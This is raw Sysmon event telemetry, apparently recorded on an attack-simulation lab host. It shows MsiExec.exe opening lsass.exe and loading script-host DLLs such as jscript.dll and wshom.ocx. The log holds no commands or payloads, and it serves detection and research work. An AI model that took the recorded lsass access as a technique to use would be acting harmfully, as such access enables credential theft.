10341000x80000000000000002693557Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.256{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693556Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.256{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693555Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.256{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002693554Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.256{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693552Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.256{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693551Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.256{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1ECtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693550Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.256{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\urlmon.dll11.00.14393.5006 (rs1_release.220301-1704)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=72DA72C24A0AD3C49AC956DC083EEDF3,SHA256=2DB817631EC24840FDED7C584BC08F03D3549D93552C8E20005E18BA5E81CA12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693549Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.241{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002693548Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.241{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManagerWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002693547Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.241{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002693546Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.241{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693545Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.225{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693544Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693543Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693542Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693541Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\scrrun.dll5.812.10240.16384Microsoft ® Script RuntimeMicrosoft ® Script RuntimeMicrosoft Corporationscrrun.dllMD5=6E948305B041BE52E45E9E942C78A3F4,SHA256=93C4A201E3627E617C478054BAB472553CF48B84C32DE2F0A316F30F4A61A782trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693540Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693539Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\wshom.ocx5.812.10240.16384Windows Script Host Runtime LibraryMicrosoft ® Windows Script Host Runtime LibraryMicrosoft Corporationwshom.ocxMD5=012C02BB5DD8EC0FD4AC2688D8D4D0CF,SHA256=B73B3C361F6B07960B092485CE8C96A4E68F741D718C6E847FF37C5BA5227C18trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693538Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693537Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693536Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002693535Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows Script\SettingsWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693534Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693533Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\jscript.dll5.812.10240.16384Microsoft ® JScriptMicrosoft ® JScriptMicrosoft Corporationjscript.dllMD5=017AA3E55F15439E32C6F461E5686CCD,SHA256=8117D34017F6F90BC9DC68E3F79346E62E389AFE9E154FF0FCB99FB921845486trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693532Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693531Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693530Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.194{7CF983DC-9825-62AC-256B-000000006202}47643292C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002693529Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693528Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693527Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693526Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693525Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693524Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693523Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693522Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002693521Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693520Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693519Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.178{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693518Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693517Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693516Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693515Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693514Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693513Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693512Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693511Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693510Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.162{7CF983DC-9825-62AC-256B-000000006202}4764C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002693509Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 